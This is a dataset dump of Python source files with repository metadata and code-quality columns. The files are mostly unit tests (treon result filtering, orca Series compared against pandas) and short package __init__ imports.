hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a07dd7ab373374ba7517072dc3362027e8347470 | 2,336 | py | Python | tests/test_treon.py | bilke/treon | e43325baa64506dd5570c229091d372931c3b9e2 | [
"MIT"
] | 292 | 2019-04-04T17:46:46.000Z | 2022-02-10T01:39:16.000Z | tests/test_treon.py | bilke/treon | e43325baa64506dd5570c229091d372931c3b9e2 | [
"MIT"
] | 19 | 2019-04-04T11:32:58.000Z | 2021-03-11T03:04:18.000Z | tests/test_treon.py | bilke/treon | e43325baa64506dd5570c229091d372931c3b9e2 | [
"MIT"
] | 26 | 2019-04-07T04:51:00.000Z | 2022-03-16T19:59:53.000Z | import os
from unittest import mock
from treon import treon
def test_filter_results_file():
args = {
"--exclude": ['resources/basic.ipynb',
'failed']
}
results = ['resources/basic.ipynb',
'resources/doctest_failed.ipynb',
'resources/runtime_error.ipynb',
'resources/unittest_failed.ipynb',
'other/resources.ipynb']
filtered = treon.filter_results(results=results, args=args)
expected = ['resources/doctest_failed.ipynb',
'resources/runtime_error.ipynb',
'resources/unittest_failed.ipynb',
'other/resources.ipynb']
assert filtered == expected
def test_filter_results_folder():
args = {"--exclude": ['resources']}
results = ['resources/basic.ipynb',
'resources/doctest_failed.ipynb',
'resources/runtime_error.ipynb',
'resources/unittest_failed.ipynb',
'other/resources.ipynb']
filtered = treon.filter_results(results=results, args=args)
expected = ['other/resources.ipynb']
assert filtered == expected
def test_filter_results_empty():
args = {"--exclude": ['resources']}
results = ['resources/basic.ipynb']
filtered = treon.filter_results(results=results, args=args)
expected = []
assert filtered == expected
def test_filter_results_homedir():
args = {"--exclude": ['~/resources']}
results = [os.path.join(os.path.expanduser("~"), "resources/basic.ipynb")]
filtered = treon.filter_results(results=results, args=args)
expected = []
assert filtered == expected
@mock.patch('os.path.isdir')
def test_filter_results_exclude_is_dir(mock_isdir):
mock_isdir.return_value = True
args = {"--exclude": ["./notebook"]}
results = ["./notebook/1.pynb", "./notebook2/1.pynb"]
filtered = treon.filter_results(results=results, args=args)
expected = ["./notebook2/1.pynb"]
assert filtered == expected
@mock.patch('os.path.isdir')
def test_filter_results_exclude_is_not_dir(mock_isdir):
mock_isdir.return_value = False
args = {"--exclude": ["./notebook"]}
results = ["./notebook1/1.pynb", "./notebook2/1.pynb"]
filtered = treon.filter_results(results=results, args=args)
expected = []
assert filtered == expected
| 32.901408 | 78 | 0.643836 | 249 | 2,336 | 5.863454 | 0.176707 | 0.106849 | 0.053425 | 0.082192 | 0.810959 | 0.810959 | 0.810959 | 0.721233 | 0.721233 | 0.721233 | 0 | 0.004897 | 0.213185 | 2,336 | 70 | 79 | 33.371429 | 0.789445 | 0 | 0 | 0.596491 | 0 | 0 | 0.292808 | 0.19649 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a0babff9e049aa2418dfe7655dc9e5e605903dba | 28 | py | Python | blackdog/osint/IP_Address/Geolocation/__init__.py | Sh-4d0w/blackdog | fefcf6b8b4c6073fa6aaf0bab34ad7e326a1ee79 | [
"Apache-2.0"
] | null | null | null | blackdog/osint/IP_Address/Geolocation/__init__.py | Sh-4d0w/blackdog | fefcf6b8b4c6073fa6aaf0bab34ad7e326a1ee79 | [
"Apache-2.0"
] | null | null | null | blackdog/osint/IP_Address/Geolocation/__init__.py | Sh-4d0w/blackdog | fefcf6b8b4c6073fa6aaf0bab34ad7e326a1ee79 | [
"Apache-2.0"
] | 1 | 2021-07-17T11:17:59.000Z | 2021-07-17T11:17:59.000Z | from .ipverse import Ipverse | 28 | 28 | 0.857143 | 4 | 28 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 28 | 1 | 28 | 28 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
26635f00247d7049eda067f30aba4571a0ef90ad | 110 | py | Python | amocrm_api_client/rate_limiter/__init__.py | iqtek/amocrm_api_client | 910ea42482698f5eb47d6b6e12d52ec09af77a3e | [
"MIT"
] | null | null | null | amocrm_api_client/rate_limiter/__init__.py | iqtek/amocrm_api_client | 910ea42482698f5eb47d6b6e12d52ec09af77a3e | [
"MIT"
] | null | null | null | amocrm_api_client/rate_limiter/__init__.py | iqtek/amocrm_api_client | 910ea42482698f5eb47d6b6e12d52ec09af77a3e | [
"MIT"
] | null | null | null | from .core import IRateLimiterDecorator
from .impl import RateLimiterImpl
from .impl import RateLimiterConfig
| 27.5 | 39 | 0.863636 | 12 | 110 | 7.916667 | 0.583333 | 0.168421 | 0.294737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 110 | 3 | 40 | 36.666667 | 0.969388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2666b004042ab034098806cd62d9e220d71a6022 | 42 | py | Python | src/oogeso/utils/__init__.py | oogeso/oogeso | 72c05fd02d62b29fc62f60daf4989370fd80cbe1 | [
"MIT"
] | 2 | 2021-05-19T13:16:20.000Z | 2021-11-05T11:47:11.000Z | src/oogeso/utils/__init__.py | oogeso/oogeso | 72c05fd02d62b29fc62f60daf4989370fd80cbe1 | [
"MIT"
] | 71 | 2021-06-01T11:03:56.000Z | 2022-03-01T09:38:37.000Z | src/oogeso/utils/__init__.py | oogeso/oogeso | 72c05fd02d62b29fc62f60daf4989370fd80cbe1 | [
"MIT"
] | null | null | null | from .util import create_time_series_data
| 21 | 41 | 0.880952 | 7 | 42 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
266f2f8ea0aaff9f0a5c8e0031d894e786bae945 | 38 | py | Python | cands/__init__.py | andrewk1/correctandsmooth | ecdb4a472d500140428220ca5382f2e4d633743b | [
"MIT"
] | 4 | 2022-01-10T06:31:47.000Z | 2022-03-28T16:31:24.000Z | cands/__init__.py | andrewk1/correctandsmooth | ecdb4a472d500140428220ca5382f2e4d633743b | [
"MIT"
] | null | null | null | cands/__init__.py | andrewk1/correctandsmooth | ecdb4a472d500140428220ca5382f2e4d633743b | [
"MIT"
] | null | null | null | from .cands import correct_and_smooth
| 19 | 37 | 0.868421 | 6 | 38 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cd9a29bb0b5cf5d7cb91772f0d0390a46f9c5ef9 | 25 | py | Python | wordsToNumbers/corpus/__init__.py | VoicuTomut/Qountry | 841467eca5704fd24c49000668f739cae8155b59 | [
"MIT"
] | null | null | null | wordsToNumbers/corpus/__init__.py | VoicuTomut/Qountry | 841467eca5704fd24c49000668f739cae8155b59 | [
"MIT"
] | null | null | null | wordsToNumbers/corpus/__init__.py | VoicuTomut/Qountry | 841467eca5704fd24c49000668f739cae8155b59 | [
"MIT"
] | null | null | null |
from .base import Corpus | 12.5 | 24 | 0.8 | 4 | 25 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 2 | 24 | 12.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
26a27cebb415623f10017806928c6aa3acde9986 | 64 | py | Python | source/__init__.py | top/media_bridging_py3 | dd5de912c07634a073768d6f0b4a6c78d3f39c98 | [
"MIT"
] | null | null | null | source/__init__.py | top/media_bridging_py3 | dd5de912c07634a073768d6f0b4a6c78d3f39c98 | [
"MIT"
] | null | null | null | source/__init__.py | top/media_bridging_py3 | dd5de912c07634a073768d6f0b4a6c78d3f39c98 | [
"MIT"
] | null | null | null | from source.feed import Feed
from source.twitter import Twitter
| 21.333333 | 34 | 0.84375 | 10 | 64 | 5.4 | 0.5 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 64 | 2 | 35 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8055fa5b83e1c50757ece0ebf8ecc180f3f5ff5 | 86 | py | Python | simuvex/simuvex/plugins/cgc.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 86 | 2015-08-06T23:25:07.000Z | 2022-02-17T14:58:22.000Z | simuvex/simuvex/plugins/cgc.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 132 | 2015-09-10T19:06:59.000Z | 2018-10-04T20:36:45.000Z | simuvex/simuvex/plugins/cgc.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 80 | 2015-08-07T10:30:20.000Z | 2020-03-21T14:45:28.000Z | print '... Importing simuvex/plugins/cgc.py ...'
from angr.state_plugins.cgc import *
| 28.666667 | 48 | 0.732558 | 12 | 86 | 5.166667 | 0.833333 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104651 | 86 | 2 | 49 | 43 | 0.805195 | 0 | 0 | 0 | 0 | 0 | 0.465116 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
f8817a28d516e69879b75c486cd30550fda6b843 | 34 | py | Python | material_mechanics/strength/__init__.py | kemeen/material_mechanics | 00442df2c41a43285708bfdb288348eb3aa50775 | [
"MIT"
] | 4 | 2019-03-06T02:02:21.000Z | 2021-04-18T09:18:50.000Z | material_mechanics/strength/__init__.py | kemeen/material_mechanics | 00442df2c41a43285708bfdb288348eb3aa50775 | [
"MIT"
] | 1 | 2019-01-10T12:00:19.000Z | 2019-01-10T12:00:19.000Z | material_mechanics/strength/__init__.py | kemeen/material_mechanics | 00442df2c41a43285708bfdb288348eb3aa50775 | [
"MIT"
] | 2 | 2020-01-25T01:59:36.000Z | 2022-03-12T03:21:41.000Z | from .puck import PuckStrengthSet
| 17 | 33 | 0.852941 | 4 | 34 | 7.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.966667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f89488f78bc40d623fe5346c82aaa711b129e05d | 129 | py | Python | ramda/drop_repeats.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 56 | 2018-08-06T08:44:58.000Z | 2022-03-17T09:49:03.000Z | ramda/drop_repeats.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 28 | 2019-06-17T11:09:52.000Z | 2022-02-18T16:59:21.000Z | ramda/drop_repeats.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 5 | 2019-09-18T09:24:38.000Z | 2021-07-21T08:40:23.000Z | from ramda.drop_repeats_with import drop_repeats_with
from ramda.equals import equals
drop_repeats = drop_repeats_with(equals)
| 21.5 | 53 | 0.860465 | 20 | 129 | 5.2 | 0.35 | 0.423077 | 0.432692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100775 | 129 | 5 | 54 | 25.8 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8a4289af5d407407d3994f181bc7a70ef703782 | 46 | py | Python | ap-python/ap_python/aspenplus/__init__.py | bshaoCN/python-automation | fc02d92ec1870bc39ced8923b905930f4e697e80 | [
"MIT"
] | 1 | 2019-06-28T13:21:39.000Z | 2019-06-28T13:21:39.000Z | ap-python/ap_python/aspenplus/__init__.py | bshaoCN/python-automation | fc02d92ec1870bc39ced8923b905930f4e697e80 | [
"MIT"
] | null | null | null | ap-python/ap_python/aspenplus/__init__.py | bshaoCN/python-automation | fc02d92ec1870bc39ced8923b905930f4e697e80 | [
"MIT"
] | null | null | null | from .application import Application, Version
| 23 | 45 | 0.847826 | 5 | 46 | 7.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 46 | 1 | 46 | 46 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8d247df87c07289831f5dba7a418d8cdcf0dcfd | 60,399 | py | Python | tests/orca_unit_testing/test_series.py | jiajiaxu123/Orca | e86189e70c1d0387816bb98b8047a6232fbda9df | [
"Apache-2.0"
] | 20 | 2019-12-02T11:49:12.000Z | 2021-12-24T19:34:32.000Z | tests/orca_unit_testing/test_series.py | jiajiaxu123/Orca | e86189e70c1d0387816bb98b8047a6232fbda9df | [
"Apache-2.0"
] | null | null | null | tests/orca_unit_testing/test_series.py | jiajiaxu123/Orca | e86189e70c1d0387816bb98b8047a6232fbda9df | [
"Apache-2.0"
] | 5 | 2019-12-02T12:16:22.000Z | 2021-10-22T02:27:47.000Z | import unittest
import orca
import os.path as path
from setup.settings import *
from pandas.util.testing import *
class Csv:
pdf_csv = None
odf_csv = None
class SeriesTest(unittest.TestCase):
def setUp(self):
self.PRECISION = 5
@classmethod
def setUpClass(cls):
# configure data directory
DATA_DIR = path.abspath(path.join(__file__, "../setup/data"))
fileName = 'USPricesSample.csv'
data = os.path.join(DATA_DIR, fileName)
data = data.replace('\\', '/')
# connect to a DolphinDB server
orca.connect(HOST, PORT, "admin", "123456")
Csv.pdf_csv = pd.read_csv(data)
Csv.odf_csv = orca.read_csv(data)
@property
def ps(self):
return pd.Series([1, 2, 3, 4, 5, 6, 7], name='x')
@property
def os(self):
return orca.Series([1, 2, 3, 4, 5, 6, 7], name='x')
@property
def psa(self):
return pd.Series([10, 1, 19, np.nan], index=['a', 'b', 'c', 'd'])
@property
def psb(self):
return pd.Series([-1, np.nan, 1, np.nan], index=['a', 'b', 'd', 'e'])
def test_series_constructor(self):
ps = pd.Series([1, 2, 3, 4, 5, 6, 7], name='x')
os = orca.Series([1, 2, 3, 4, 5, 6, 7], name='x').to_pandas()
assert_series_equal(ps, os)
def test_series_constructor_hasNan(self):
ps = pd.Series([7, np.NaN, 1, np.NaN])
os = orca.Series([7, np.NaN, 1, np.NaN]).to_pandas()
assert_series_equal(ps, os)
def test_series_constructor_hasFloat(self):
ps = pd.Series([7.4, 3.1415826535, np.NaN, -3.4], name='x')
os = orca.Series([7.4, 3.1415826535, np.NaN, -3.4], name='x').to_pandas()
assert_series_equal(ps, os)
def test_series_constructor_with_index(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5]).to_pandas()
assert_series_equal(ps, os)
# def test_series_constructor_from_dict(self):
# d = {'a': [1, 2, 3], 'b': [4, 5, 6]}
# ps = pd.Series(d)
# os = orca.Series(d)
# assert_series_equal(ps, os)
def test_series_constructor_from_scalar(self):
ps = pd.Series(1)
os = orca.Series(1).to_pandas()
assert_series_equal(ps, os)
def test_series_attributes_index(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
assert_index_equal(ps.index, os.index.to_pandas())
ps = pd.Series([7, 2, 1, 4], index=['a', 'b', 'c', 'd'])
os = orca.Series([7, 2, 1, 4], index=['a', 'b', 'c', 'd'])
assert_index_equal(ps.index, os.index.to_pandas())
ps = pd.Series([7, 2, 1, 4], pd.date_range("20190101", periods=4, freq="d"))
os = orca.Series([7, 2, 1, 4], orca.date_range("20190101", periods=4, freq="d"))
assert_index_equal(ps.index, os.index.to_pandas())
def test_series_attributes_array(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
# TODO: pandas.Series.array returns a pandas Array, while orca.Series.array returns a list
self.assertEqual(list(ps.array), os.array)
def test_series_attributes_values(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
assert_numpy_array_equal(ps.values, os.values)
ps = pd.Series(['a', 'b', 'c', 'd'])
os = orca.Series(['a', 'b', 'c', 'd'])
assert_numpy_array_equal(ps.values, os.values)
ps = pd.Series(pd.date_range("20190101", periods=10, freq="d"))
# os = orca.Series(pd.date_range("20190101", periods=10, freq="d"))
os = orca.Series(ps)
assert_numpy_array_equal(ps.values, os.values)
def test_series_attributes_dtype(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.dtype, os.dtype)
ps = pd.Series(['a', 'b', 'c', 'd'])
os = orca.Series(['a', 'b', 'c', 'd'])
self.assertEqual(ps.dtype, os.dtype)
ps = pd.Series(pd.date_range("20190101", periods=10, freq="d"))
# os = orca.Series(pd.date_range("20190101", periods=10, freq="d"))
os = orca.Series(ps)
self.assertEqual(ps.dtype, os.dtype)
def test_series_attributes_shape(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.shape, os.shape)
def test_series_attributes_nbytes(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.nbytes, os.nbytes)
def test_series_attributes_ndim(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.ndim, os.ndim)
def test_series_attributes_size(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.size, os.size)
def test_series_attributes_T(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
assert_series_equal(ps.T, os.T.to_pandas())
def test_series_attributes_hasnans(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.hasnans, os.hasnans)
ps = pd.Series([7, 2, 1, np.nan], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, np.nan], index=[3, 1, 5, 5])
self.assertEqual(ps.hasnans, os.hasnans)
def test_series_attributes_dtypes(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.dtypes, os.dtypes)
def test_series_attributes_name(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
ps.name = "S1"
os.name = "S1"
self.assertEqual(ps.name, os.name)
def test_series_binary_operator_function_series_hasnan(self):
ps = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
os = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
# TODO: series_hasNan: fail to initialize a series with np.nan values
# psb = pd.Series([10, 1, 19, np.nan], index=['a', 'b', 'c', 'd'])
# osb = orca.Series([10, 1, 19, np.nan], index=['a', 'b', 'c', 'd'])
# c1 = ps + psb
# c2 = (os + osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps - psb
# c2 = (os - osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps * psb
# c2 = (os * osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps / psb
# c2 = (os / osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps ** psb
# c2 = (os ** osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps // psb
# c2 = (os // osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps % psb
# c2 = (os % osb).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_add_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps + 1
c2 = (os + 1).to_pandas()
assert_series_equal(c1, c2)
